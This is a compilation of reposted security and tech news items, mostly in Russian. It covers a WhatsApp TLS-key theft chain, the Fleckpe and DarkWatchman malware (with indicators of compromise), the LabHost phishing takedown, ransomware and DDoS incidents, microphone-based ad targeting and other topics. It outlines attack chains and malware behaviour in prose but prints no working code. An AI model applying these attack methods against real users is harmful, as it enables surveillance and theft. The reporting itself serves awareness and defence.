“An adversary that has somehow gained access to the external cache directory (e.g. through a rogue or vulnerable application) can steal TLS 1.3 PSK keys and TLS 1.2 Master Secrets. As already discussed, this could lead to successful man-in-the-middle attacks.” continues the analysis. “we will use the previously described SOP bypass vulnerability in Chrome, to remotely access the TLS session secrets. All an attacker has to do is lure the victim into opening an HTML document attachment. WhatsApp will render this attachment in Chrome, over a content provider, and the attacker’s Javascript code will be able to steal the stored TLS session keys.”
Upon obtaining the session keys, threat actors can perform a stage a man-in- the-middle attack to achieve remote code execution or even exfiltrate the Noise protocol key pairs which are used to implement end-to-end encryption of user communications.
“WhatsApp comes with a debugging mechanism that allows its development team to catch fatal errors happening in the wild during the first few days of a release. More specifically, if an OutOfMemoryError exception is thrown, a custom exception handler is invoked that collects System Information, WhatsApp Application Logs, as well as a dump of the Application Heap (collected using android.os.Debug::dumpHprofData()). These are uploaded to crashlogs.whatsapp.net.” states the report.
When OutOfMemoryError exception is thrown , WhatsApp uploads the encoded key pairs along with other data to logs server. This happens only when the devices run a new version of the app and “less than 10 days have elapsed since the current version’s release date.”
The attackers could deliberately throw the exception to force the data being sent to the server and intercept it.
Google mitigated this attack by introducing the “scoped storage” model that allows each app to access only their own app-specific cache files.
The above vulnerabilities were addressed by WhatsApp with the release of version 2.21.4.18.
_“CENSUS strongly recommends to users to make sure they are using WhatsApp version 2.21.4.18 or greater on the Android platform, as previous versions are vulnerable to the aforementioned bugs and may allow for remote user surveillance. CENSUS has tracked the TLS 1.2 man-in-the-disk vulnerability under CVE-2021-24027.” concludes the report.
“There are many more subsystems in WhatsApp which might be of great interest to an attacker. The communication with upstream servers and the E2E encryption implementation are two notable ones. Additionally, despite the fact that this work focused on WhatsApp, other popular Android messaging applications (e.g. Viber, Facebook Messenger), or even mobile games might be unwillingly exposing a similar attack surface to remote adversaries.”_
Политику по борьбе с отмыванием денег можно считать провалившейся. С таким заявлением на своей странице в социальной сети X выступил генеральный директор криптовалютной платформы Coinbase Брайан Армстронг, сославшись на свежий отчет ООН по борьбе с киберпреступлениями.
«AML-проверки обходятся примерно в 213 миллиардов долларов в год, наносят при этом вред и законопослушным потребителям (как мы видели на примере многочисленных историй о дебанкинге). Но они пресекают лишь около 0,2 процента всей незаконной деятельности», — написал Армстронг.
Click to expand...
Бизнесмен также предположил, что с таким уровнем неэффективности мог бы что- нибудь сделать Департамент эффективности правительства (DOGE) — отсутствующий пока орган власти в США, о создании которого говорил избранный президент страны Дональд Трамп. По мнению Трампа, это ведомство мог бы возглавить миллиардер Илон Маск.
Армстронг известен своим негативным отношением к существующей системе регулирования криптовалютных рынков. По его мнению, слишком серьезные затраты на AML нельзя рассматривать вне контекста эффективности политик. Кроме того, он, как и другие критики, уверены, что существующие подходы приносят для простых пользователей больше вреда, чем пользы, негативно сказываясь на инновациях.
x.com/brian_armstrong/status/1862932878021005361
Приложение для обмена якобы шифрованными сообщениями Session объявило о смене своей юрисдикции. Теперь Session юридически переезжает из Австралии в Швейцарию после того, как федеральная полиция нагрянула в дом одного из сотрудников компании. По словам президента фонда Session Technology Foundation (STF) Алекса Линтона, решение было принято из-за усиливающегося давления со стороны правоохранительных органов Австралии.
Полиция решила допросить сотрудника компании по поводу работы приложения. Офицеры AFP спрашивали детали, относящиеся к расследованию, которое было связано c конкретным пользователем Session.
Линтон пояснил, что перед компанией встал выбор: остаться в Австралии или перенести свою деятельность в более лояльную к вопросам приватности юрисдикцию.
Теперь разработка и поддержка приложения будет осуществляться новым швейцарским фондом — Session Technology Foundation (STF). STF будет отвечать за управление репозиториями кода, публикацию приложений и контроль над криптографическими ключами. Несмотря на трения с местными силовиками, приложение Session продолжит функционировать на территории Австралии.
Некоторые комментаторы-скептики посчитали такой ход со стороны STF PR-акций, чтобы привлечь к себя внимание и заманить пользователей, прикрывшись легендой о давлении со стороны полиции.
Является ли мессенджер "анонимным" и "суперзащищенным" — крайне спорный вопрос.
404media.co/encrypted-chat-app-session-leaves-australia-after-visit-from- police-2
404 Media ранее сообщала, что компания Cox Media Group (CMG) рекламировала сервис, который утверждал, что таргетирует рекламу, основываясь на том, что потенциальные клиенты говорят вблизи микрофонов устройств. Теперь вот презентация ("pitch-deck"), которую CMG разослала потенциальным компаниям. В ответ на это Google исключила CMG из своей партнерской программы.
Медиагигант Cox Media Group (CMG) утверждает, что может нацеливать рекламу на
основе того, что потенциальные клиенты говорят вслух возле микрофонов
устройств, и прямо указывает на Facebook, Google, Amazon и Bing как на
партнеров CMG, согласно презентации CMG, полученной 404 Media.
Сами слайды из презентации предоставляют больше информации и вызывает больше вопросов о рекламируемой CMG возможности, которую она называет Active Listening. В декабре 404 Media впервые сообщила о существовании Active Listening, используя материалы с сайта CMG, после чего компания удалила эту информацию. Презентация, которую компания отправила по крайней мере одной компании, которую она уговаривала купить ее услуги Active Listening, показывает, как CMG продвигает продукт компаниям, которые могут захотеть нацелить потенциальных клиентов на основе данных, якобы полученных с микрофонов устройств. Google исключила CMG из программы рекламных партнеров после того, как 404 Media обратилась к Google за комментариями по поводу слайдов.
«Сила голоса (и микрофонов наших устройств)», - говорится на слайдах. «Умные устройства в режиме реального времени собирают данные о намерениях, прослушивая наши разговоры. Рекламодатели могут объединить эти голосовые данные с поведенческими данными, чтобы нацелиться на потребителей на рынке. Мы используем искусственный интеллект для сбора этих данных из 470+ источников, чтобы улучшить развертывание, таргетинг и эффективность кампаний».
В документе не говорится, откуда CMG якобы берет эти голосовые данные, будь то конкретная марка «умного» телевизора, «умная» колонка или смартфон с определенным приложением. В нем говорится, что после использования голосовых данных для определения аудитории, «готовой к покупке», CMG составляет список этих людей и загружает его на рекламные платформы для последующего таргетирования рекламы. В сообщении говорится, что за 100 долларов в день CMG может нацелиться на людей в радиусе 10 миль или за 200 долларов в день - в радиусе 20 миль.
В документе утверждается, что CMG сотрудничает с Google, Amazon и Facebook. В частности, говорится, что CMG является премьер-партнером Google, что означает, что они входят в первые три процента участвующих рекламодателей в данной стране; что CMG была первым медиапартнером Amazon Advertising; и что она была одной из первых медиакомпаний, ставших маркетинговым партнером Facebook. Предположительно, в данном контексте слайд говорит о рекламе в целом, а не конкретно о продукте Active Listening.
На другом слайде конкретно говорится, что возможности CMG направлены на
«Google/Bing» со списком потенциальных клиентов.
В своем заявлении компания Google сообщила 404 Media, что «все рекламодатели
должны соблюдать все применимые законы и правила, а также политику Google Ads,
и когда мы выявляем рекламу или рекламодателей, нарушающих эту политику, мы
принимаем соответствующие меры». Компания заявила, что удалила CMG из
партнерской программы после проверки Google.
Amazon сообщила 404 Media в заявлении, что «Amazon Ads никогда не работала с CMG по этой программе и не планирует этого делать». Компания добавила, что если ей станет известно, что партнер нарушает ее маркетинговые рекомендации, она может принять соответствующие меры.
Meta заявила, что не может комментировать конкретные аккаунты рекламодателей, но отметила, что рекламодатели должны иметь необходимые права на использование любых данных в рамках своих кампаний. После того как Google удалил CMG, Meta сообщила 404 Media, что выясняет, не нарушила ли CMG условия и положения компании, и заявила, что примет меры, если сочтет их необходимыми.
Представители Microsoft по связям с прессой ответили в электронном письме, что компании «нечем поделиться на данный момент», и не ответили на вопрос, планирует ли она предпринимать какие-либо действия, как это сделал Google.
На другом слайде изложены «дальнейшие шаги» для компаний, заинтересованных в
использовании продукта CMG для передачи голосовых данных. Они включают в себя
серию внутренних встреч и встреч с клиентами в преддверии запуска рекламной
кампании.
Когда в декабре 404 Media впервые сообщила об активном прослушивании, на сайте
CMG было написано: «Что бы значило для вашего бизнеса, если бы вы могли
нацелиться на потенциальных клиентов, которые активно обсуждают потребность в
ваших услугах в своих повседневных разговорах? Нет, это не эпизод из «Черного
зеркала» - это голосовые данные, и CMG обладает возможностями для их
использования в интересах вашего бизнеса». После публикации нашего материала
CMG удалила эту страницу со своего сайта.
404 Media также сообщила, что сотрудники MindSift, крошечной компании из Нью- Гэмпшира, хвастались в собственном подкасте тем, что нацеливают рекламу, прослушивая повседневные разговоры людей через микрофоны в их умных колонках. После публикации этого материала социальные сети MindSift замолчали, а компания удалила упоминания о возможности получения голосовых данных со своей страницы в Instagram.
статья: <https://www.404media.co/heres-the-pitch-deck-for-active-listening-ad- targeting/>
Университетские исследователи проверили устойчивость криптосистемы CRYSTALS- Kyber к атакам по стороннему каналу (side-channel) и обнаружили, что использование машинного обучения позволяет получить закрытый ключ. Результаты, по мнению экспертов, говорят лишь об уязвимости реализации, а не слабости самого алгоритма.
В прошлом году американский Институт стандартов и технологий (NIST) выбрал CRYSTALS-Kyber в качестве кандидата на стандарт шифрования, устойчивого к взлому с помощью квантового компьютера. Данная система с открытым ключом также включена в список криптоалгоритмов, которые АНБ США рекомендует использовать для защиты национальных систем, поэтому в Королевском технологическом институте (Kungliga Tekniska högskolan, KTH) Стокгольма решили оценить ее криптостойкость с помощью концептуальной атаки side-channel.
Для реализации алгоритма исследователи использовали процессор ARM Cortex-M4, а для эксплойта — нейросеть, натренированную по методу рекурсивного обучения (recursive learning), специально разработанному в KTH.
Источником информации, позволяющей получить нужные подсказки, являлись слабые флуктуации электропотребления. Команде экспериментаторов удалось усилить слив битов из таких сообщений и ускорить таким образом восстановление содержимого с вероятностью выше 99%.
Созданная методика на основе машинного обучения, по словам авторов исследования, позволяет обойти обычные меры защиты от side-channel — использование масок, перестановки, случайных задержек, кода с постоянным весом, полиморфизма, рандомизации тактовой частоты. Представленный в отчете подход пригоден также для испытания других криптосистем с открытым ключом, использующих теорию решеток.
В комментарии для журналистов представитель NIST [подчеркнул](https://www.scmagazine.com/analysis/policy/post-quantum- algorithm-attack), что проведенное в KTH исследование выявило уязвимость реализации CRYSTALS-Kyber, с которой там работали. Сам алгоритм взлому не подвержен, и у экспертов к нему претензий нет.
В России тоже осознают, что прогресс в сфере квантовых вычислений создал новые вызовы, повысив требования к криптозащите данных. Над созданием новых методов трудятся, в числе прочих, в НИЯУ МИФИ; там уже разработали PoC криптопротокола, взломать который не сможет даже квантовый компьютер.
GitHub [опубликовал](https://github.blog/2021-04-29-call-for-feedback- policies-exploits-malware/) [изменения](https://github.com/github/site- policy/pull/397/) правил, [определяющих](https://github.com/github/site-policy/tree/security-research- malware-exploits-policy-update) политику в отношении размещения эксплоитов и результатов исследования вредоносного ПО, а также соблюдения действующего в США Закона об авторском праве в цифровую эпоху (DMCA). Изменения пока находятся в состоянии черновика, доступного для обсуждения в течение 30 дней.
В правила соблюдения DMCA, помимо ранее присутствовавшего запрета распространения и обеспечения установки или доставки активного вредоносного ПО и эксплоитов, [добавлены](https://github.com/github/site- policy/pull/395/files) следующие условия:
• Явный запрет помещения в репозитории технологий для обхода технических средств защиты авторских прав, включая лицензионные ключи, а также программы для генерации ключей, обхода проверки ключей и продления бесплатного периода работы.
• Вводится порядок подачи заявки на удаление такого кода. От подающего заявку на удаление требуется предоставление технических деталей, с задекларированным намерением передать эту заявку на экспертизу до блокировки.
• При блокировке репозитория обещают обеспечить возможность экспортировать issuе и PR-ы, и предложить юридические услуги.
Изменения, внесённые в правила, касающиеся эксплоитов и вредоносного ПО, учитывают критику, прозвучавшую после удаления компанией Microsoft прототипа эксплоита для Microsoft Exchange, используемого для совершения атак. В новых правилах предпринята попытка явного отделения содержимого, предоставляющего опасность и используемого для совершения активных атак, и кода, сопровождающего исследования в области безопасности. Внесённые изменения:
• Запрещено не только атаковать пользователей GitHub путём размещения на нём контента с эксплоитами или использовать GitHub как средство доставки экспдоитов, как было раньше, но и размещать вредоносный код и эксплоиты, сопутствующие проведению активных атак. В общем виде не запрещено размещение примеров эксплоитов, подготовленных в ходе исследований безопасности и затрагивающих уже исправленные уязвимости, но всё будет зависеть от того, как трактовать термин "активные атаки".
Например, публикация в любом виде исходных текстов JavaScript-кода, атакующего браузер, подпадает под данный критерий - злоумышленнику ничего не мешает загрузить исходный код в браузер жертвы fetch-ем, автоматически пропатчить, если прототип эксплоита опубликован в неработоспособном виде, и выполнить. Аналогично с любым другим кодом, например на C++, - ничто не мешает скомпилировать его на атакуемой машине, и выполнить. При обнаружении репозитория с подобным кодом его планируется не удалять, а закрывать к нему доступ.
• Перенесён выше по тексту раздел, запрещающий "спам", накрутки, участие в рынке накруток, программы для нарушения правил каких-либо сайтов, фишинг и его попытки.
• Добавлен пункт с пояснением возможности подачи апелляции в случае несогласия с блокировкой.
• Добавлено требование к владельцам репозиториев, в которых в рамках исследований безопасности размещается потенциально опасное содержимое. Наличие подобного содержимого должно быть явно упомянуто вначале файла README.md, а в файле SECURITY.md должны быть предоставлены контактные данные для связи. Указано, что в общем виде GitHub не удаляет эксплоиты, опубликованные вместе с исследованиями безопасности для уже раскрытых уязвимостей (не 0-day), но оставляет за собой возможность ограничить доступ, если посчитает, что сохраняется риск применения данных эксплоитов для реальных атак и в службу поддержки GitHub поступают жалобы об использовании кода для атак.
В Google Play время от времени попадаются вредоносные приложения, которые на первый взгляд кажутся безобидными. Среди них есть и очень коварные — например, подписочные троянцы, чью активность пользователи нередко замечают, только когда с них уже списали деньги. Эти троянцы регулярно появляются в официальном магазине Android-приложений. Таким способом распространялось, например, семейство Jocker, а также недавно обнаруженное семейство Harly. Наша новая находка, которую мы назвали Fleckpe, тоже распространяется через Google Play — в составе фоторедакторов, приложений с обоями для телефона и т. д.
Троянец активен, по нашим данным, с начала 2022 года. Мы нашли в Google Play 11 инфицированных этим зловредом приложений, которые установили пользователи более 620 тысяч устройств. На момент публикации нашего отчета этих приложений в Google Play уже нет. Однако злоумышленники могли выложить другие, пока не обнаруженные, поэтому реальное число установок троянца может быть гораздо больше.
Зловред работает следующим образом. При запуске приложения подгружается сильно обфусцированная нативная библиотека, содержащая вредоносный дроппер, который расшифровывает и запускает полезную нагрузку из ресурсов приложения.
Подгрузка вредоносной библиотеки
Полезная нагрузка связывается с командным сервером злоумышленников и отправляет данные о зараженном устройстве — в частности, коды MCC (Mobile Country Code) и MNC (Mobile Network Code), которые позволяют определить, в какой стране находится жертва и каким оператором сотовой связи она пользуется. Командный сервер в ответ отправляет страницу с платной подпиской. Троянец открывает ее и пытается от имени пользователя подписаться на услугу. Если для этого необходимо ввести код подтверждения, зловред перехватывает уведомления, доступ к которым запрашивает в самом начале, и ищет в них подходящий код.
Перехват уведомлений
Заполучив код, троянец подставляет его в нужное поле и завершает оформление подписки. Жертва при этом пользуется легитимными функциями приложения — например, устанавливает обои или редактирует фото — и не знает, что ее подписывают на платные услуги.
Подстановка полученного кода
Троянец постоянно совершенствуется. В последних версиях разработчики решили расширить функциональность нативной библиотеки и включить в нее не только дроппер, но и б о льшую часть кода, при помощи которого оформляются платные подписки. Полезная нагрузка при этом отвечает только за перехват уведомлений и просмотр веб-страниц, то есть выполняет роль «моста» между компонентами операционной системы, необходимыми для оформления платной подписки, и нативным кодом. Это сделано для того, чтобы значительно усложнить анализ, а также затруднить обнаружение троянца защитными решениями. В отличие от нативной библиотеки, полезная нагрузка практически не защищена от обнаружения, хотя в последней версии злоумышленники добавили незначительную обфускацию кода.
Мы обнаружили в коде троянца зашитые MCC и MNC, которые злоумышленники, судя по всему, использовали для тестов. Коды оказались тайскими, а среди отзывов на зараженные приложения в Google Play преобладали отзывы на тайском языке. Поэтому мы полагаем, что зловред нацелен на пользователей из Таиланда, хотя, по данным нашей телеметрии, есть жертвы и в других странах, в частности в Польше, Малайзии, Индонезии и Сингапуре.
естовые MCC и MNC — тайские
Защитные решения «Лаборатории Касперского» детектируют этот зловред как Trojan.AndroidOS.Fleckpe.
К сожалению, подписочные троянцы в последнее время набирают популярность. Более того, в качестве канала для их распространения злоумышленники все чаще выбирают официальные платформы, такие как Google Play. Растущая сложность зловредов помогает им успешно проходить многочисленные проверки на стороне магазинов приложений и оставаться незамеченными достаточно продолжительное время. При этом пострадавшие пользователи чаще всего далеко не сразу обнаруживают непрошенные подписки, не говоря уже о том, что еще сложнее бывает понять, откуда они взялись. Поэтому такие троянцы дают злоумышленникам надежный источник нелегального дохода.
Чтобы избежать заражения и последующей потери денег, стоит внимательно относиться к приложениям (даже если они загружены в Google Play): не давать им лишних разрешений и защищать устройства решением, способным выявлять подобных троянцев.
Имена пакетов
com.impressionism.prozs.app
com.picture.pictureframe
com.beauty.slimming.pro
com.beauty.camera.plus.photoeditor
com.microclip.vodeoeditor
com.gif.camera.editor
com.apps.camera.photos
com.toolbox.photoeditor
com.hd.h4ks.wallpaper
com.draw.graffiti
com.urox.opixe.nightcamreapro
MD5
F671A685FC47B83488871AE41A52BF4C
5CE7D0A72B1BD805C79C5FE3A48E66C2
D39B472B0974DF19E5EFBDA4C629E4D5
175C59C0F9FAB032DDE32C7D5BEEDE11
101500CD421566690744558AF3F0B8CC
7F391B24D83CEE69672618105F8167E1
F3ECF39BB0296AC37C7F35EE4C6EDDBC
E92FF47D733E2E964106EDC06F6B758A
B66D77370F522C6D640C54DA2D11735E
3D0A18503C4EF830E2D3FBE43ECBE811
1879C233599E7F2634EF8D5041001D40
C5DD2EA5B1A292129D4ECFBEB09343C4
DD16BD0CB8F30B2F6DAAC91AF4D350BE
2B6B1F7B220C69D37A413B0C448AA56A
AA1CEC619BF65972D220904130AED3D9
0BEEC878FF2645778472B97C1F8B4113
40C451061507D996C0AB8A233BD99FF8
37162C08587F5C3009AFCEEC3EFA43EB
BDBBF20B3866C781F7F9D4F1C2B5F2D3
063093EB8F8748C126A6AD3E31C9E6FE
8095C11E404A3E701E13A6220D0623B9
ECDC4606901ABD9BB0B160197EFE39B7
C&C
Клиент Альфа-Банка получил задолженность в 87 млн рублей, решив провести эксперимент с открытием максимально возможного количества счетов. Позже в кредитной организации объяснили, почему на балансе у мужчины отображается такой огромный минус.
Изначально клиент по имени Юрий был должен 514 тыс. рублей Тинькофф Банку. Кредитная организация подала в суд и с мужчины взыскали эти деньги.
Но помимо «Тинькофф» приставы отправили исполнительный лист также в Альфа- Банк, где у Юрия было открыто семь счетов. «Альфа» наложил арест в 514 тыс. на каждый из этих счетов, в результате чего клиент оказался должен банку 3,5 млн рублей. Гражданин отправился в кредитную организацию, но там заявили, что ничем не могут помочь.
После этого Юрий открыл еще один счет в «Альфе», который моментально тоже заблокировали с долгом в 514 тыс. Тогда клиент решился на эксперимент: открыл около 150 счетов (то есть максимум возможных за год), в результате чего его баланс стал показывать минус 87 млн рублей.
В пресс-службе Альфа-Банка сообщили, что «по факту у Юрия долг перед приставами, банку он ничего не должен» и там лишь «исполняют решение суда». «Сумма 87 миллионов — некорректная, он должен приставам ровно столько, сколько написано в постановлении суда. Арест накладывается на все счета, это неверное отображение реального долга», — пояснили в кредитной организации.
source: t.me/bazabazon/16597
Хакеры Killnet обрушили сайты госорганов в нескольких штатах США.
Взлому подверглись официальные порталы правительств Алабамы, Колорадо, Коннектикута, Делавэра, Флориды, Аляски, Гавайев, Айдахо, Индианы, Канзаса, Кентукки и Миссисипи. На данный момент они не работают.
Хакеры сообщили, что кибератака, которую они анонсировали ещё в конце сентября, будет продолжаться в течение 72 часов.
Click to expand...
А ведь предупреждали люди.
Компания Bakker Logistiek, занимающаяся хранением и перевозками, пострадала от атаки шифровальщика. В итоге это спровоцировало нехватку сыра в голландских супермаркетах. Дело в том, что Bakker Logistiek — один из крупнейших поставщиков логистических услуг в Нидерландах, занимающийся хранением и транспортировкой продуктов питания для голландских магазинов, рассказывает издание Bleeping Computer.
На прошлой неделе Bakker Logistiek подверглась атаке вымогательского ПО, которое зашифровало устройства в сети компании и нарушила транспортировку и доставку еды.
«Мы не могли получать заказы от клиентов. На наших складах не знали, где находятся продукты. Это очень большие склады, там вы не просто ищете поддон. Также мы не могли планировать перевозки. У нас сотни грузовиков, такое тоже не делается вручную», — рассказывал глава компании Тун Верховен.
Click to expand...
Какой именно шифровальщик стал виновником «сырного дефицита», не раскрывается, но Верховен сообщал, что злоумышленники могли получить доступ к системам через недавно обнаруженные уязвимости в Microsoft Exchange (ProxyLogon) .
В итоге сбой привел к нехватке некоторых продуктов питания на полках магазинов, а особенно сыра в крупнейшей сети супермаркетов страны, Albert Heijn. Из-за этого на сайте сети даже появилось уведомление, предупреждающее покупателей о возможной недоступности расфасованного сыра.
Пустые полки Albert Heijn
Компания Bakker Logistiek заверяет, что может восстановить поврежденные системы из резервных копий, и уже согласовывает свои действия с клиентами, чтобы как можно скорее возобновить поставки.
Источник: xakep.ru/2021/04/13/bakker-logistiek/
Платформа LabHost, работавшая по схеме phishing-as-a-service («фишинг-как- услуга», PhaaS), была ликвидирована в ходе длившейся целый год операции правоохранительных органов. Полиция взломала инфраструктуру платформы и задержала 37 подозреваемых, среди которых был и разработчик LabHost.
Фишинговая платформа была запущена в 2021 году и позволяла злоумышленникам, платившим ежемесячную абонентскую плату, проводить атаки с использованием различных фишинговых наборов на банки и сервисы в Северной Америке.
Кроме того, LabHost предоставляла инфраструктуру для размещения фишинговых страниц, а также автоматической генерации и рассылки фишинговых писем, что позволяло даже низкоквалифицированным преступникам легко реализовать свои атаки.
В феврале 2024 года ИБ-компания Fortra предупредила, что LabHost постепенно превращается в популярную PhaaS-платформу, опережая других игроков на этом рынке.
Координируемая Европолом международная операция правоохранительных органов, получавшая названия PhishOFF и Nebulae, началась около года назад, и в ней приняли участие полицейские из 19 стран мира, а также компании частного сектора, включая Microsoft, Trend Micro, Chainalysis, Intel 471 и The Shadowserver Foundation.
Представители Европола сообщают, что во время расследования было обнаружено не менее 40 000 фишинговых доменов, связанных с LabHost, и сервисом пользовались более 10 000 человек по всему миру. По оценкам властей, операторы сервиса заработали порядка 1 173 000 долларов на продаже PhaaS-подписок.
Также следователи установили, что операторы LabHost похитили около 480 000 банковских карт, 64 000 PIN-кодов и около миллиона паролей от различных онлайн-аккаунтов. Так, в Австралии было выявлено более 94 000 жертв, а в Великобритании — около 70 000.
«При средней ежемесячной плате в размере 249 долларов LabHost предлагал ряд незаконных услуг, которые можно было настраивать и развертывать всего в несколько кликов», — говорят следователи.
Специалисты Европола особо отмечают мощный инструмент под названием LabRat, благодаря которому сервис выделялся на фоне конкурентов. LabRat представлял собой средство управления фишинговыми кампаниями в режиме реального времени, позволяя злоумышленникам перехватывать токены двухфакторной аутентификации (2ФА) и обходить защиту учетных записей.
В период с 14 по 17 апреля 2024 года правоохранительные органы по всему миру одновременно провели обыски по 70 адресам и арестовали 37 человек, подозреваемых в связях с сервисом LabHost.
Кроме того, австралийский объединенный координационный центр по борьбе с киберпреступностью (JPC3) сообщает об уничтожении 207 серверов, на которых размещались фишинговые сайты, созданные с помощью LabHost. А полиция Великобритании объявила об аресте четырех человек, участвовавших в управлении сайтом сервиса, а также «исходного разработчика платформы».
Вскоре после того, как правоохранители взяли под контроль инфраструктуру LabHost, 800 пользователям были разосланы сообщения с предупреждением о том, что скоро они станут объектами новых расследований.
sc:
europol.europa.eu/media-press/newsroom/news/international-investigation-
disrupts-phishing-service-platform-labhost
afp.gov.au/news-centre/media-release/global-sting-sees-australian-offenders-
arrested-cybercrime-and-phishing
news.met.police.uk/news/law-enforcement-infiltrates-fraud-platform-used-by-
thousands-of-criminals-worldwide-482687
On April 8, 2023, the founder of VKontakte and Telegram, Pavel Durov, participated in the Dubai auction, where he offered 35 million UAE dirhams (about 773 million rubles) for a car number consisting of only one digit 7. private Telegram channel reported Stanislav Isaev, blogger and Whitewill representative.
According to Isaev, the auction was organized by the UAE Ministry of Transport and was charitable. Proceeds will be used to build urban infrastructure and go to the 1 Billion Meals foundation, which aims to distribute one billion portions of food to those in need worldwide.
The car number, consisting of only a seven, was put for a starting price of 15 million dirhams (331 million rubles). But the next step was to immediately increase the price of the land to 30 million dirhams (662 million rubles). The third step, according to Isaev, was taken by Pavel Durov – 35 million dirhams were bet.
Although the price Durov set was already quite high, there was an auctioneer in the hall who bid 50 million dirhams (1.1 billion rubles) and won the auction. The winner chose to remain anonymous.
It appears from Isaev’s post that the lot price of 50 million dirhams is a record for auctions organized by the UAE Ministry of Transport.
Formerly socialbites.ca Wrote Pavel Durov changed his name to Paul du Rove in his French passport.Click to expand...
RU:
8 апреля 2023 года основатель «ВКонтакте» и Telegram Павел Дуров принял участие в аукционе в Дубае, где предложил 35 миллионов дирхамов ОАЭ (около 773 миллионов рублей) за автомобильный номер, состоящий всего из одной цифры 7. Об этом сообщил частный Telegram-канал. Станислав Исаев, блогер и представитель Whitewill.
По словам Исаева, аукцион был организован Министерством транспорта ОАЭ и носил благотворительный характер. Вырученные средства будут использованы для строительства городской инфраструктуры и пойдут в фонд 1 Billion Meals, целью которого является раздача одного миллиарда порций еды нуждающимся во всем мире.
Автомобильный номер, состоящий всего из семерки, был выставлен за стартовую цену в 15 миллионов дирхамов (331 миллион рублей). Но следующим шагом было немедленное повышение цены земли до 30 миллионов дирхамов (662 миллиона рублей). Третий шаг, по словам Исаева, сделал Павел Дуров – было поставлено 35 миллионов дирхамов.
Хотя цена, которую назначил Дуров, была уже довольно высокой, в зале находился аукционист, который предложил 50 миллионов дирхамов (1,1 миллиарда рублей) и выиграл аукцион. Победитель предпочел остаться неизвестным.
Из поста Исаева следует, что цена лота в 50 миллионов дирхамов является рекордной для аукционов, организованных Министерством транспорта ОАЭ.
Ранее socialbites.ca писал, что Павел Дуров сменил фамилию на Поль дю Роув во французском паспорте.Click to expand...
Source: https://socialbites.ca/tech-scifi/233747.html
ещё один повод удалить свой аккаунт Телеграм на всегда и поменть смои NFT и TON-coin... на что-то другое
Обнаружен новый троян удаленного доступа (RAT), который распространяется через фишинговую кампанию и прячется от механизмов обнаружения с помощью техники «бесфайлового» присутствия.
Исследователи из Prevailion Adversarial Counterintelligence Team (P.A.C.T) прозвали эту малварь DarkWatchman. Собственную C&C-инфраструктуру программа определяет с помощью устойчивого алгоритма генерации доменов (DGA), скрываясь при этом в реестре, через который также незаметно выполняет все свои операции с хранилищем.
Со слов Шермана Смита, исследователя из P.A.C.T:
«Троян задействует новейшие методы реализации бесфайлового присутствия и внутрисистемной активности, а также динамические возможности среды выполнения, такие как самообновление и рекомпиляция. Он демонстрирует очередной шаг в развитии техник бесфайлового присутствия, поскольку все операции временного и постоянного хранения реализует через реестр системы, не прибегая к записи на диск, что позволяет избегать обнаружения большинством средств защиты. Изменения в реестре вполне типичное явление, и бывает трудно определить, какие из них являются аномальными и выходят за рамки обычного поведения системы или ПО».
Как сообщают в Prevailion, среди жертв оказалась одна из российских корпораций, в которой начиная с 12 ноября 2021 года был обнаружен ряд вредоносных артефактов. Сама организация не называется. Учитывая особенности внедрения в систему и долгосрочного присутствия, команда P.A.C.T сделала вывод, что DarkWatchman может использоваться группами хакеров в качестве инструмента проникновения в систему и шпионажа.
Интересным следствием этой новейшей разработки стало то, что она полностью исключает для операторов необходимость найма аффилянтов, на которых обычно возлагается доставка блокирующих файлы вредоносов и последующее извлечение этих файлов. Использование DarkWatchman в качестве первой ступени развертывания вирусов-вымогателей предоставляет его разработчикам лучший надзор над ходом всей операции.
функции, устанавливающие кейлоггера в реестр
Распространяясь посредством адресных фишинговых писем, маскируемых под уведомление о «завершении срока бесплатного хранения» российской логистической компании Pony Express, DarkWatchman формирует скрытый шлюз для выполнения последующих вредоносных действий. Сама полезная нагрузка трояна содержится в прикрепляемом к письму ZIP-архиве, который преподносится под видом накладной.
По своей сути, DarkWatchman является двухкомпонентным – это и JS-троян, и C#-кейлоггер, последний из которых скрывается от обнаружения в реестре. Оба компонента также чрезвычайно легковесны. JS-код занимает всего 32Кб, а кейлоггер едва дотягивает до 8.5Кб.
«Сохранение двоичного файла в реестре в виде закодированного текста говорит об устойчивом закреплении Darkwatchman, хотя при этом в память диска на постоянную он никогда не записывается. Это также означает, что операторы вредоноса могут обновлять (или заменять) программу при каждом ее выполнении». — сообщили исследователи.
После установки DarkWatchman может запускать произвольные исполняемые файлы, загружать DLL, выполнять JS-код и даже самоликвидироваться с машины. Его JS- подпрограмма также отвечает за закрепление в системе путем создания запланированной задачи, которая запускает вредонос при каждом входе пользователя.
В отчете также говорится, что:
«Сам кейлоггер не сообщается с C&C и не записывает информацию на диск. Вместо этого он пишет лог в ключ реестра, который используется в качестве буфера. В ходе операции троян считывает и очищает этот буфер перед передачей его содержимого на C&C-сервер».
Авторство DarkWatchman еще не установлено, но в Prevailion описали его команду как сильную. При этом исследователи отметили эксклюзивную нацеленность трояна на российский компании, а также орфографические ошибки, обнаруженные в образцах исходного кода, из чего можно сделать вывод, что операторы вряд ли являются в корне англоговорящими людьми.
• Source: https://www.prevailion.com/darkwatchman-new-fileness-techniques/
A large BGP routing leak that occurred last night disrupted the connectivity for thousands of major networks and websites around the world.
Although the BGP routing leak occurred in Vodafone's autonomous network (AS55410) based in India, it has impacted U.S. companies, including Google, according to sources.
Yesterday, Cisco's BGPMon spotted a discrepancy in an internet routing system,
potentially indicating some BGP hijacking activity taking place:
"Prefix 24.152.117.0/24, is normally announced by AS270497 RUTE MARIA DA
CUNHA, BR."
"But beginning at 2021-04-16 15:07:01, the same prefix (24.152.117.0/24) was also announced by ASN 55410," stated BGPMon's announcement.
Doug Madory, director of Internet analysis at Kentik further confirmed these findings stating that the autonomous system ASN 55410 was seeing a 13 times spike in inbound traffic directed to it.
This occurred from the network mistakenly advertising that it supported over 30,000 BGP prefixes or routes, when it didn't, causing the internet to flood this network with traffic that was not meant to go through it.
The said autonomous system (AS55410) belongs to Vodafone India Limited.
Large BGP routing leak out of India this morning.
AS55410 mistakenly announced over 30,000 BGP prefixes causing a 13x spike in inbound traffic to their network according to @kentikinc netflow data.
(cc: @anurag_bhatia, @aftabsiddiqui, @jaredmauch) pic.twitter.com/PQ4iiTKD2Q
— Doug Madory (@DougMadory) April 16, 2021Click to expand...
According to Kentik's analysis, some U.S. companies, including Google, were also affected as a result of this incident which appears to have lasted from a little before 13:50 to around 14:00 UTC on April 16, 2021.
